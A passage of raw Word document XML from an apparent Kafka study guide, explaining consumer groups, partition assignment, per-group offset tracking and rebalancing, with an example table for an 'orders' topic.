          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reads from a unique subset of partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the topic, ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel processing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while avoiding duplicate consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694E6C82" w14:textId="77777777" w:rsidR="00CC2805"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CBF015A">
          <v:rect id="_x0000_i3133" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A5A527" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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lastRenderedPageBreak/>
        <w:t>🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Key Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD6830" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1317"/>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Each partition is consumed by only one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the group at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1652DAEC" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1317"/>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Multiple consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can consume from the same topic </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if they belong to different consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A55AE4" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1317"/>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Offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are tracked </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>per consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allowing independent consumption progress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C976B" w14:textId="77777777" w:rsidR="00CC2805"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6A394D1">
          <v:rect id="_x0000_i3134" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0769E5BA" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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Why Use Consumer Groups?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EBBCF" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1318"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Distribute load across multiple consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897A042" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1318"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Add more consumers to improve throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEBD653" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1318"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a consumer crashes, others in the group can take over</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189F988" w14:textId="77777777" w:rsidR="00CC2805"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C90D577">
          <v:rect id="_x0000_i3135" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1536A5E8" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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Offset Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C878467" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1319"/>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Kafka tracks the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>last read offset</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each partition </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>per consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF5C6E" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1319"/>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Consumers commit offsets </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically or manually</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB9A8EC" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1319"/>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This helps </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resume processing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without data loss or duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F925214" w14:textId="77777777" w:rsidR="00CC2805"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B5A1145">
          <v:rect id="_x0000_i3136" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B63BC21" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C35295D"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Suppose we have a topic orders with 3 partitions: orders-0, orders-1, orders-2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E80936D"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A consumer group order-processor with 3 consumers (C1, C2, C3) will hav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6"/>
        <w:gridCol w:w="1866"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="57C7EB1F" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65A490BD" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7551A22F" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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Assigned Consumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="754007B1" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B93DC74"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orders-0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="627D1FF6"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C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="2343AAE0" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3473FDA6"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orders-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60D695F4"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C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="6BBF51F6" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75FF292A"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orders-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58DB2FA2"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C3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25B82ABA"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If C2 fails, Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rebalances</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and reassigns orders-1 to another active consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254BEBD4" w14:textId="77777777" w:rsidR="00CC2805"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9555224">
          <v:rect id="_x0000_i3137" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA2D7B7" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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63"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="3C77B18A" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E3A6E0F" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="629D028C" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="6B258B61" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56E2DE90"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Group of consumers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58811593"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Work together to consume topic data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="0F216F8D" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A61066C"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One partition per consumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17400C38"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Ensures load balancing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="5668B325" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10C13856"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Offset tracked per group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F9AF2FD"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Enables replay or resume</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="70AD2EF2" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09AD671D"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Rebalancing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C5980C0"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Happens when consumers join or leave the group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EEEFB04" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CC280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93D1343">
          <v:rect id="_x0000_i3138" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EB6815" w14:textId="0681AF9F" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC6AFF" w:rsidP="00BC6AFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="777" w:name="_Toc196308257"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the concept of a Kafka consumer group and how it allows multiple consumers to scale and consume messages from topics</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="777"/>
    </w:p>
    <w:p w14:paraId="60EC095C" w14:textId="1DEB530D" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Kafka Consumer Group – Concept &amp; Scaling Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A300315"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Consumer Group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
